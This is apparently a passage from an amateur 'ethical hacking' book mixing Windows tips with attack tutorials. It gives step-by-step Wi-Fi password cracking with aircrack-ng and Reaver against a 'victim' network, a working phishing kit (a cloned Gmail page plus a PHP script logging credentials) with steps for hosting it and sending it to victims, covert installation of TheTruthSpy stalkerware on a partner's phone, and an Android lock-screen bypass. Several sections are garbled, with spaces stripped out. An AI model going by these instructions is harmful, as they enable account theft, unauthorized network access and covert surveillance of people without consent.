One of the easiest tools for testing SQL injections is the Firefox extension named SQL Inject ME. After you install the extension, the tool is available in the right-click context menu, as well as from Tools → Options. The sidebar of SQL Inject ME is shown in the next screenshot and, as you can see, there are many tests you can run:

You can choose which tests to run and which values to test. When you press one of the Test buttons, the selected tests will start. When the tests are done, you will see a report of how the tests ended.

There are many options you can set for the SQL Inject ME extension, as shown in the next two pictures:

As you see, there are many steps you can take in order to clean your code of potential SQL injection vulnerabilities. Don't neglect these simple steps, because if you do, you will compromise the security not only of your sites but also of all the sites that are hosted with your web hosting provider.

WPA2 TESTING

WI-FI HACKING USING BACKTRACK

After performing the SQL injection, I can bet that you now have an endless curiosity to explore more about ethical hacking. So in this article we are going to perform a hardcore hack using Backtrack Linux: we are going to learn how to crack Wi-Fi using Backtrack. One more thing I want to add here is that all the material I am sharing with you is for study purposes only. If you have black intentions, just leave the book now. If you perform the steps in this article on your computer, you will be responsible for any damage caused by you.

So let’s start the article:

Now let us start with Wi-Fi cracking. But before starting the tutorial, let me give you a small introduction to what Wi-Fi hacking is and what security protocols are associated with it.

In a secured wireless connection, data is sent via encrypted packets. These packets are secured with network keys. There are basically 2 types of security keys:

WEP (Wireless Encryption Protocol): This is the most basic form of encryption. It has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case, many people still use this encryption.

WPA (WI-FI Protected Access): This is the most secure wireless encryption. Cracking such a network requires the use of a wordlist of common passwords. This is a sort of brute force attack. It is virtually uncrackable if the network is secured with a strong password.

So let’s begin the actual Wi-Fi hacking tutorial! In order to crack a Wi-Fi password, you require the following things:

For Wi-Fi hacking you need to install Backtrack on your computer.

I am assuming that you have already installed Backtrack on your PC. If not, it is very easy to install by making a bootable live CD/DVD. For the installation process you can just Google it; you will find it easily.

Now open the console from the taskbar: click on the icon next to the dragon-like icon in the taskbar in the above screenshot. You will get a Command Prompt-like shell called the console terminal.

1) Let's start by putting our wireless adapter in monitor mode. It allows us to see all of the wireless traffic that passes by us in the air. Type airmon-ng in the console terminal and press Enter. You will have a screen like this; note down the name of the interface, in this case the name is wlan0.

2) Now type ifconfig wlan0 down and hit Enter.

This command will disable your wireless adapter; we are doing this in order to change your MAC address.

Now, you need to hide your identity so that you will not be identified by the victim. To do this you need to type ifconfig wlan0 hw ether 00:11:22:33:44:55 and hit Enter.

This command will change your MAC address to 00:11:22:33:44:55.

3) The next task is to type airmon-ng start wlan0 and press Enter.

This will start the wireless adapter in monitor mode. Note down the new interface name; it could be eth0 or mon0 or something like that.

The above command in the console has started your network adapter in monitor mode as mon0:

4) Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.

This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:

airodump-ng mon0

In the above screenshot there is a list of available networks. Choose one network and note its BSSID and channel.

5) Type airodump-ng -c channelno –bssid BSSIDN1 mon0 -w filename and hit Enter.

Replace channelno and BSSIDN1 with the data from step 4. Replace mon0 with the network interface name from step 3. In place of filename write any name and do remember it. Better to use filename itself.

This command will begin capturing packets from the network. You need to capture more and more packets in order to crack the Wi-Fi password. This packet capturing is a slow process.

6) To make the packet capturing faster, we will use another command. Open a new shell; don’t close the previous shell. In the new shell type aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit Enter.

Replace BSSIDN1 with the data from step 4 and mon0 with the name from step 3. This command will boost the data capturing process. The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 is the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address, and the command ends with your wireless adapter's device name.

7) Now wait for a few minutes; let the DATA in the other console reach a count of 5000.

8) After it reaches 5000, open another console, type aircrack-ng filename-01.cap and hit Enter. Replace filename with the name you used in step 5 and add -01.cap to it. .cap is the extension of the file holding the captured data packets. After typing this command, aircrack will start trying to crack the Wi-Fi password. If the encryption used is WEP, it will surely crack the password within a few minutes.

In case of WPA, use the following command instead of the above:

aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap

Replace BSSIDN1 and filename with the data you used. /pentest/wireless/aircrack-ng/test/password.lst is the address of a file holding a wordlist of popular passwords. In case of WPA, aircrack will try to brute force the password. As I explained above, to crack WPA you need a file of passwords to crack the encryption. If you are lucky enough and the network owner is not smart enough, you will get the password.

PREVENTION: For prevention from being hacked you can refer to the chapter “PASSWORD CREATING POLICIES”.

NEWBIE’S WAY TOWARDS REVERSE ENGINEERING

Nowadays people expect more from an application than what is provided by the developers. People want to use that specific application according to their own preferences. So now we are here with an article on the topic of reverse engineering. Let’s start with simple engineering: “simple engineering” is the task of developing/building something, BUT reverse engineering refers to the task of redeveloping/rebuilding something. In simple words, reverse engineering is the task of modifying the source code of an application to make it work our way.

Reverse engineering is a very complicated topic and is very difficult for beginners to understand, as it requires prior knowledge of assembly language.

Developing is easy but redeveloping is not easy!! During development a programmer has to deal with functions, pointers, conditions, loops etc… But during the decompilation process we need to deal with registers!

Generally 32 bit / 64 bit Windows supports mainly 9 registers:

Performing Registers
> EAX: Extended Accumulator Register
> EBX: Base Register
> ECX: Counter Register
> EDX: Data Register

Index
> ESI: Source Index
> EDI: Destination Index

Pointer
> EBP: Base Pointer
> ESP: Stack Pointer
> EIP: Instruction Pointer

So, let’s move on to “How to modify the applications”. The general requirements you need for the modification are listed below and are easily available on the internet:

1. OllyDBG
2. CrackMe App (register and activate your account before download)

PROCESS:

When you have downloaded both apps, first of all launch the CrackMe App. It will ask you to enter the password; enter any password you want and hit “OK”.

Now it will show you the error “You are not authorized to use the application”.

Now open OllyDBG and open the CrackMe app in it. When you have opened the CrackMe app in OllyDBG, scroll up in the upper left box until you find a statement like this:

JE SHORT Password.00457728

Basically, this is a conditional jump: if the condition is true it will jump to 00457728, which shows us the message “You are not authorized to use the application”, and if the condition is not true it just continues reading the code. So we don’t need this jump to work, as we don’t want to get the error message.

Now, to remove the error message, we can change JE SHORT Password.00457728 to JNE SHORT Password.00457728. JNE (Jump If Not Equal) means that if the password is correct it will give you the error message, and if the password is incorrect it will give you the correct message.

To make the change, just double click the line JE SHORT Password.00457728, change it to JNE SHORT Password.00457728, and hit “Assemble”.

Now hit the blue “PLAY” button in the upper part of OllyDBG to start the CrackMe app again and enter the password; it will then give you the correct message.

PHISHING ATTACK AHEAD

EMAIL AND FACEBOOK HACKING BY PHISHING

What is phishing?

Phishing is an attempt by the sender to get the receiver of an email to release their personal information, i.e. the attacker lures the victims into giving up some confidential information.

Why phishing?

There are many password cracking tools that come and go in the market. But phishing is the most efficient method to steal confidential information like passwords, credit card numbers, bank account numbers etc.

How phishing works?

It works just like normal fishing. A fisherman generally throws bait into the water to lure the fish. Then a fish comes to take the food, feeling that it is legitimate. When it bites the bait, it is caught by the hook. Now the fisherman pulls out the fish.

In the same way, the hacker sends a fake login page to the victim. The victim thinks that it is a legitimate one and enters his confidential information. Now the data will be with the hacker. Now, let’s learn how to hack by phishing: I am selecting a Gmail account to be hacked by phishing.

Forphishingyouneedthefollowingstuffs:Firstofallyouhavetoopen

thegamil.combyyourbrowserandwhenpageopencompletely,justgivearightclickonthepageandadialogueboxwillopensafteryouhavinganoption“viewpagesource”init.Clickonthe“viewpagesource”optionandyouseethatthesourcecodeofthatpagewillopensafteryou.Thenpressctrl+Ftoopenthetext/wordfindingbox.Type“action=”andreplace

itwithanything.phpSuchas“action=mail.php”Thenfindforthe“method=”andalsoreplaceitwith“get”.Suchasmethod=”get”.

Thensavethefilebyanything.htmlSuchas“Gmail.html”Thencreateablanknotepadfile“log.txt”Theagainopenthenotepadandtypethefollowingcodes:

<?phpheader("Location:http://www.Gmail.com");$handle=fopen("logs.txt","a");foreach($_GETas$variable=>$value){fwrite($handle,$variable);fwrite($handle,"=");fwrite($handle,$value);fwrite($handle,"\r\n");}fwrite($handle,"\r\n");fclose($handle);exit;

?>

Andsaveitas“mail.php”(savethisfilebysamenameasyouhavereplacedthe“action=”)Nowfinallyyouhavethethreefileswhicharerequiredforthephishing.1)Gmail.html(fakeloginpage)2)mail.php(tocapturethelogindetails)3)log.txt(tostorethe

captureddetails)

Procedure:step1:createanaccountinanyfreewebhostingsitelikewww.bythost.comwww.000webhost.comwww.ripway.comwww.my3gb.com

step2:Nowuploadallthethreefilesyouhavedownloaded.(Ihavetakenwww.my3gb.com)

step3:Givethelinkofthefakepagetoyourvictim.

eg:www.yoursitename.my3gb.com/Gmail.htmlStep4:whenheclicksthelink,itopensafakeGmailpagewhereheentershislogindetails.Whenheclickssigninbutton,hislogin

detailswillbestoredinlog.txtfile.Demonstration:

HereIhaveuploadedmyscriptsontowww.my3gb.com

AndcopytheGmail.htmllinkwhichyouhavetosendthevictim.iclickedtheGmail.htmllinkAfakepagewasopenedwhereienteredmylogindetails.

ThispagewilllooksexactlysimilartotheoriginalGmailloginpage.Andwhenthevictimentershis/herlogindetailsforlogginginintohis/heraccount.Now,thistimethevictimwill

redirectedtotheoriginalGmailloginwebsite.Thevictimwillevendon’tknowthathis/heraccountgothacked.Victimwillthinkthatthepagegetsreloadedduetointerneterrorsorloginmistakesetc.

Nowhis/herlogindetailswerecapturedbythephpscriptandstoredinlog.txtfileasshowninthefigurebelow:

In the same way you can hack FACEBOOK accounts and other social networking accounts.

How to protect ourselves from phishing?

Don’t use links
Be suspicious of any e-mail with urgent requests
By using secured websites
Using efficient browsers
Using Antivirus or internet security software.

USB SECURITY

Securing Pen Drives From Malicious Viruses

Today, a giant downside for Windows users is securing their data from viruses. Especially with pen drives, nobody wants to keep their vital data on them, because pen drives are portable devices and through sharing data they may get infected by viruses like the shortcut virus, Autorun.inf, the new folder virus etc. Some folks recover their data by merely using Command Prompt; however, some folks assume there is only one possibility left, and that is to format the pen drive.

So, if your pen drive is infected by any of those viruses, you can follow these steps to get your hidden data back.

Open CMD (Command Prompt).
Open the flash drive in CMD (if your drive is ‘G’ then enter ‘G:’ after c:\user\ and press [ENTER]).
Now type the following command and hit Enter: attrib -s -h /s /d

Now open your pen drive in Windows and you may see all of your files. However, wait! Is it enough? No way! Your pen drive is still not totally secure. The above command simply shows all of your files that were hidden by viruses. If you want to shield your USB from receiving unwanted files, i.e. virus, worm, spy, Trojan etc., then you need to follow these steps.

What I’m going to tell you is a way to set up your registry to stop a computer from saving files to your USB. If you have Windows 7 or Windows 8 then you can disable the write option to USB drives. This trick is incredibly useful if you have a virus on your laptop and want to copy files from a USB drive but don’t want to transfer the virus to the USB. Follow the given steps to disable the USB writing option:

Open Notepad and copy and paste the following:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000001

Now save the file with the extension “.reg”.

Click on the file you just saved. In the pop-up window select Yes and then OK. That’s it, your USB is now secure.

TURNING THE SECURITY OFF

To turn this security measure off, open Notepad and copy and paste the following:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000000

Now save the file with the extension “.reg”. Click on the file you just saved. In the pop-up window click Yes and then OK. That’s it, your defense is now disabled.

PDF SECURITY

HOW TO PROTECT YOUR PDF FILES FROM COPYING

These days it’s a big deal to secure your PDF documents. In this article I will show you “HOW TO PROTECT YOUR PDF FILES FROM BEING COPIED FOR PIRACY AND OTHER MALICIOUS INTENTIONS”.

To protect your PDF files you can use a tool called “A-PDF password security”. You can set a password and prevent people from copying and pasting PDF contents. Here is an easy tutorial to make you aware of how to use that tool.

Install “A-PDF password security”. Launch the program and open the password protect wizard.

Select the option “single pdf document security” and push the button “next>”.

Click the “browse” button to open the PDF file that will be encrypted, and select the security level and encryption method. You can set up a password for opening and for modifying your document.

Click “save” or “save as” to set a document open password and disallow the copying permission.

After saving the file you can choose to open the saved PDF file with the default PDF viewer, set another PDF file’s security, or open the destination folder in Windows Explorer.

Open the saved PDF file with the default PDF viewer.

NOTIFY ME

SENDING A MESSAGE TO OTHER USER IN YOUR PC

In this article we are going to learn how to send a message to another user account on your own PC.

Let’s assume you want to leave a message for your brother or sister, who have user accounts on the same PC on which you also have a user account.

Follow these steps to pass a message to another user account at its next login.

Open the task manager of your PC by pressing the CTRL+ALT+DEL keys simultaneously. Then click on the user option to view the available user accounts on your PC.

Select the other user account to which you want to pass the message. Then click on the “send message” option placed in the lower right corner.

A dialogue box will open. Type any message you want to convey to them. If you want to shock them then you can type “HELLO USER… YOUR COMPUTER IS INFECTED BY TROJAN”.

And when the other user logs in to his/her user account, the same message will be displayed to him.

“I AM A FOLDER I DON’T HAVE A NAME”

HOW TO CREATE A FOLDER WITH EMPTY NAME

This is the most interesting article of this book, and here I will show you how to create a folder without naming it. Sometimes it will be very useful for you.

Let’s assume you have simply hidden a folder. When you search for it by name from the address bar, it will be opened easily. So think: if there is a folder without a name, how can it be possible to search for it from the address bar or search box? Follow these steps to create a folder without a name:

Open the location where you want to create the folder.
Just right click anywhere to create the folder.
When it asks you to rename the folder, hold down the ALT key and, while keeping ALT pressed, press “2, 5, 5” one by one. Then press Enter.

You will find that it creates a folder without any name.

SPYINGWITHANDROID

HACKINGANDROIDPHONE

Hellofriends,nowinthisarticlewewilllearnthathowtospyoveranandroidphone.Nowthesedaysaretheeraofsmartphonesbasedon

androidspecially.InthisarticleIwillshowyouthathowtogetthedetailsofthevictimbyspyingovervictim’sandroidphone.Thisisthebestwaytokeeptrackingyourchildandalsoyourgirlfriends.

ForspyingnowIamusingatoolnameasTHETRUTHSPY.

Byusingthistoolyoucaneasilykeeptrackingthevictim’sandroidphone.

Iamshowingyouthescreenshotsofthosethingswhichwecanspyfromanandroidphone…suchasCALLHISTORY,WHATSAPPMESSAGES,andSMSDETAILSetc.…listisshownbelowinthescreenshot.

Note:-thistoolisalsoavailableforIOSdevices.

Youhavetofollowthestepstostartspying.

Firstofallyouhavetodownloadtheapkfileofthistoolandinstallitonthevictim’sandroidphoneandlogintoit.Thistoolisonlyof800kbsoyoucaneasilymanageit

withinseconds.Averyinterestingthingisaboutthistoolisthatyoucanalsohidethistoolfromthevictimsandroidphone.sothatvictimwillnotawareaboutit.Nowyoucandownloadtheapkfilefromthewebsite(my.thetruthspy.com).Afterinstallingtheappgoonthesamewebsiteoftheappbyyourcomputerandresisterusingyouremailidandlogintoviewthedetailsofthe

victim’sandroidphone.ForgettingdetailsgetensurethatthedataconnectionofthevictimsphoneshouldbeON.Whenyouwanttounhidetheappfromthevictim’sphonejustmakeacallfromthevictim’sphoneto#2013*.

Note:-sometimesthis“thetruthspy”isstopworking.soyoucanalsosearchanyotherspytoolbysimpleGooglesearches.You

willfindalotoftoolslikethisandhavealmostsamefunctioning.

MOBILE: “I CAN CONTROL YOUR PC”

FULL CONTROL YOUR PC BY PHONE

Now I have a very interesting thing for you… I know you got tired of the difficult hacking chapters above.

In this article I am going to tell you how to control your computer fully from your mobile phone. It’s a very interesting thing for you if you are tired of using the trackpad and keyboard of your computer.

So let’s see how to do it. In this article I am going to use a tool named UNIFIED REMOTE, which is used to remotely control our PC.

Unified Remote is an app that lets you control your entire Windows computer from your Android device. It turns your device into a Wi-Fi or Bluetooth remote control for all the programs on your computer. With this app you can control a wide range of applications, including simple mouse and keyboard, media players and other external gadgets that can be connected to your computer (such as USB-UIRT and tellstick). It even provides extensive capabilities for users to create their own custom remotes for their needs.

Follow these simple steps to remotely control your PC with Unified Remote:

Download and install the Unified Remote server on your computer (Windows). You can easily find it with a Google search. When you have installed it, launch it.

Connect your Android phone to the same Wi-Fi network as your computer. Alternatively, if your computer is Bluetooth ready, pair it with your phone.

Download and install the apk file of Unified Remote from the Play Store. At launch, confirm that you have installed the server.

Then add a new server, select “automatic” and the app will find your computer. Tap your computer’s name to connect. Now you are ready to start controlling your computer with your phone. Tap remote in the app.

The “Basic input” remote will bring up the mouse, which you can use as a trackpad. Instructions for using the mouse will appear on screen. There are also a lot of other options available by which you can control your computer in different ways.

Example: keyboard controlling, file manager, media, power, start, YouTube etc.

LAUNCH GOD MODE

LAUNCHING WINDOWS GOD MODE

Here I have a nice Windows trick for you which saves you much time. In this article we will learn how to launch GOD MODE on your computer.

Windows god mode is a simple way to get centralized access to all the administrative options that are normally seen inside the control panel, collected into a newly created folder which can be placed anywhere on the computer. Usually the administrative options are scattered inside the control panel, arranged in different categories and subcategories. Windows god mode arranges all the administrative options inside one single window. You will find it much more neatly arranged and user friendly.

Let’s see how to launch god mode in simple steps:

You need to create a new folder for this launch. Right click in the window where you want to create a new folder. When it asks you to rename that folder, you have to enter the following code after any word.

Example: Ujjwal.{ED7BA470-8E54-465E-825C-99712043E01C}
Or Saurabh.{ED7BA470-8E54-465E-825C-99712043E01C}
Or Anything.{ED7BA470-8E54-465E-825C-99712043E01C}

Don’t forget to use the curly brackets. After renaming the folder press Enter.

You will see that the icon of that folder changes, and when you open it you will find all the settings arranged in a well-organized manner in it.

CRACKING LOCK SCREEN

HOW TO CRACK ANDROID LOCK SCREEN

In this article we are going to learn how to bypass the Android lock screen.

We are going to bypass the lock screen using a tool named Aroma File Manager.

This is the best method for cracking the Android pattern lock; you must have a custom recovery installed on your device in order to use this method. Let’s start cracking the Android lock screen.

First of all download the Aroma File Manager zip file. Google it and you will find it easily.

Now copy this Aroma File Manager zip to the root of your SD card. After copying the zip file to the SD card, boot your phone into recovery mode (each phone has a different key combination to boot into recovery mode; you can search for it on Google).

In recovery choose “install zip from SD card” or “apply update from SD card”, then select the Aroma.zip which you downloaded earlier.

After installing or updating, Aroma File Manager will open; use the volume up and down keys for scrolling as you do in recovery. In Aroma File Manager go to the menu, which is located in the bottom strip, and after clicking menu select settings. Go to the bottom of settings and select “mount all partitions in startup”; after mounting, exit Aroma File Manager. Now launch Aroma File Manager again.

In Aroma go to Data >> System. You will find “Gesture.key” if you have applied a gesture lock or “Password.key” if you have applied a password.

Long press “Gesture.key” or “Password.key”, whichever one is available; after the long press it will prompt some options. Choose delete, delete that file and restart your device (first exit from Aroma File Manager, then restart your phone).

Yuppie! Your phone is unlocked now. After rebooting it will ask you for the lock pattern; don’t worry, now you can use any pattern, your old pattern has gone away.

REAVER BACKTRACK

WI-FI CRACKING USING REAVER IN BACKTRACK

Well, in this article I will show you how to crack a WPA2-PSK key using a tool named REAVER. Reaver cracks the key by the brute force method.

Let’s see how to crack the key using Backtrack. I am using Backtrack 5 r3. So open the console and follow the given steps:

The first thing to do is run the command: Airmon-ng start wlan0

The next command to write is: Airodump-ng wlan0

With this command we look for available networks and information regarding BSSID, PWR, Beacons, data, channel etc…

Now you need to run the following code: Reaver -i mon0 -b -c BSSID –c channel network name

Note: Use the values of BSSID, channel and network name in the above command.

I have executed the command and it starts to work as shown in the picture below:

Now you have to wait; the time taken depends on the strength of the password and the speed of your internet connection.

And finally, after brute forcing, it will give you the WPA2 pin.

WINDOWS SHORTCUTS

SOME USEFUL WINDOWS SHORTCUTS

1. Windows Key + Tab: Aero
2. Windows Key + E: Launches Windows Explorer
3. Windows Key + R: Run Command box
4. Windows Key + F: Search
5. Windows Key + X: Mobility Center
6. Windows Key + L: Lock Computer
7. Windows Key + U: Ease of Access box
8. Windows Key + P: Projector
9. Windows Key + T: Cycle Super Taskbar Items
10. Windows Key + S: OneNote Screen Clipping Tool
11. Windows Key + M: Minimize All Windows
12. Windows Key + D: Show/Hide Desktop
13. Windows Key + Up: Maximize Current Window
14. Windows Key + Down: Restore Down / Minimize
15. Windows Key + Left: Tile Current Window to the Left
16. Windows Key + Right: Tile Current Windows Right
17. Windows Key + # (any number)
18. Windows Key + =: Magnifier
19. Windows Key + plus: Zoom in
20. Windows Key + Minus: Zooms out
21. Windows Key + Space: Peek at the desktop

DATA FORENSICS

HOW TO RECOVER PERMANENTLY DELETED FILES

In this article we will learn how to recover permanently deleted files from our computer. Sometimes your important data is accidentally deleted from your computer as well as from the recycle bin, and it is very important to recover that file or data.

So here I am using a tool named “Stellar Phoenix Windows Data Recovery” to recover the permanently deleted files.

By using this tool you can recover your accidentally deleted data from your computer.

For this you have to follow the simple steps mentioned below:

Click on the option “deleted file recovery” or “folder recovery” according to your choice. Then choose the local drive which you want to scan for the deleted files/folders. It then asks you for a quick scan or a deep scan; you can choose according to your need.

After that it scans for all the deleted files/folders on the local drive you selected.

It then shows you the list of all the folders from which files were deleted.

Then you have to select the deleted file/folder which you want to recover, as I have selected here “hacking tools” from the folder “vi”. Then click on the recover option to recover your data successfully.

Note: The recovered data will work only when the location from which that file/folder was accidentally deleted is empty / has not been overwritten.

CONCLUSION:

Thanks for reading this book. I hope the contents described in this book will help you to know the intents of hackers. Now you are capable of securing your own and your surrounding computers, mobile phones and other networks from the threat we called “HACKING An art of exploitation”.
